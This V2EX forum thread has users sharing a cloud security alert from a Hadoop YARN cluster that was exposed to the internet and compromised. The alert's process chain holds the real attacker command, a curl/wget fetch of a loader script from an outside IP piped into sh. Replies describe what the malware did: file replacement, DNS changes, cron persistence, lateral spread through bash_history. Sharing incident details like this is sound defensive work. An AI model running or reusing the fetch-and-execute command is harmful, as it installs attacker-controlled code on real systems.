由于 有个同事手滑 把 emr 开放给公网了,结果被挂了挖矿的货,发出来大家看看

2021-05-17 16:28:41 +08:00
 galenzhao

恶意脚本-恶意脚本代码执行待处理
备注
该告警由如下引擎检测发现:
命令行: wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh
进程 PID: 20234
进程文件名: wget
父进程 ID: 19624
父进程文件路径: /usr/bin/bash
进程链:
-[3020]  /usr/lib/jvm/java-1.8.0/bin/java -Dproc_nodemanager -Xmx1536m -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir= -Dyarn.id.str=hadoop -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Dnodemanager.audit.logger.appender=NMAUDIT -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -Dyarn.policy.file=hadoop-policy.xml -server -javaagent:/var/lib/ecm-agent/data/jmxetric-1.0.8.jar=host=localhost,port=8649,mode=unicast,wireformat31x=true,process=YARN_NodeManager,cxss=/var/lib/ecm-agent/data/jmxetric.xml -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -XX:+PrintGCDateStamps -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=128M -Xloggc:/var/log/hadoop-yarn/nodemanager-gc.log -Dhadoop.log.dir=/var/log/hadoop-yarn -Dyarn.log.dir=/var/log/hadoop-yarn -Dhadoop.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.log.file=yarn-hadoop-nodemanager-emr-worker-22.cluster-42193.log -Dyarn.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.home.dir=/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1 -Dhadoop.root.logger=INFO,RFA -Dyarn.root.logger=INFO,RFA -Djava.library.path=/usr/lib/hadoop-current/lib/native::/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/lib/native -classpath /etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/etc/ecm/hadoop-conf:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/common/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/hdfs/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/lib/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/mapreduce/*:/usr/lib/hadoop-current/lib/*:/usr/lib/tez-current/*:/usr/lib/tez-current/lib/*:/etc/ecm/tez-conf:/opt/apps/extra-jars/*:/usr/lib/spark-current/yarn/spark-2.4.5-yarn-shuffle.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/usr/lib/hadoop-current/contrib/capacity-scheduler/*.jar:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/*:/opt/apps/ecm/service/hadoop/2.8.5-1.6.1/package/hadoop-2.8.5-1.6.1/share/hadoop/yarn/lib/*:/etc/ecm/hadoop-conf/nm-config/log4j.properties org.apache.hadoop.yarn.server.nodemanager.NodeManager
    -[19619]  bash /mnt/disk2/yarn/usercache/dr.who/appcache/application_1612510029551_7345/container_1612510029551_7345_02_000001/default_container_executor.sh
        -[19622]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh
            -[19624]  /bin/bash -c (curl --user-agent hadoopUnauth http://194.145.227.21/ldr.sh||wget --user-agent hadoopUnauth -q -O - http://194.145.227.21/ldr.sh)|sh

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于 bash 、powershell 、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。

http://194.145.227.21/ldr.sh

2506 次点击
所在节点    分享发现
3 条回复
march1993
2021-05-17 16:57:44 +08:00
1 ) 还有一个 BrowserUpdate.exe 。。替换所有的 .html .php .jsp 。。 真牛逼。。咋不在 html 里注入 js 来得实在呢。。
2 )还把 8.8.8.8 写入 dns 配置了,这是被 dns 坑惨过?
3 )没有 crontab 还给你装一个??还 apt yum 都支持的那种???
4 )顺着 bash_history 把登录过的主机全给感染? 666
5 )服务器本身倒是没有被挖矿。。。
galenzhao
2021-05-17 23:48:16 +08:00
@march1993 挖矿是另一个 py 的脚本 他自己删除自己了🙄
missz
2021-05-18 10:16:06 +08:00
应该是云盾之类的安全软件删的

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/777463

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX